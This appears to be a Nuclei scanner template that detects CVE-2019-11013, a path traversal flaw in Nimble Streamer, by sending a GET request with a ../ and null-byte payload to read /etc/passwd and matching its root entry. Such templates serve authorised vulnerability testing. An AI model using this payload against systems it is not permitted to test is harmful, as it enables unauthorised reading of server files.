id: CVE-2019-11013 info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko severity: medium description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server. reference: - https://www.exploit-db.com/exploits/47301 - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-11013 cwe-id: CWE-22 tags: cve,cve2019,lfi,nimble requests: - method: GET path: - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200